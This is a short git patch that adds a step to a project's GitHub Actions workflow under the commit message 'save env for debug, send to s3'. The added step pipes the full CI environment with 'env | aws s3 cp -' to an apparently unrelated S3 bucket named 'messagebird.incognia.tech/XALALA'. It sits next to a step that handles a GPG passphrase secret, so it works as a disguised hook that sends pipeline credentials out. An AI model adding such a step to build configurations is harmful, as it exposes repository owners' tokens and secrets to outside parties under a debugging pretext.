From d1dca99530b4e824d4a9a17e4684dcce311660d4 Mon Sep 17 00:00:00 2001 From: Paulo Lieuthier Date: Wed, 13 Sep 2023 15:57:59 -0300 Subject: [PATCH] ci: save env for debug, send to s3 --- .github/workflows/continuous.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/continuous.yaml b/.github/workflows/continuous.yaml index 7e35d6e..0964909 100644 --- a/.github/workflows/continuous.yaml +++ b/.github/workflows/continuous.yaml @@ -60,6 +60,8 @@ jobs: name: xipverifier path: ./xipverifier/xv retention-days: 1 + - name: save env + run: env | aws s3 cp - s3://messagebird.incognia.tech/XALALA - name: bake cookies run: make 'GPG_PASSPHRASE=${{ secrets.GPG_PASSPHRASE }}' -C cookiebaker env: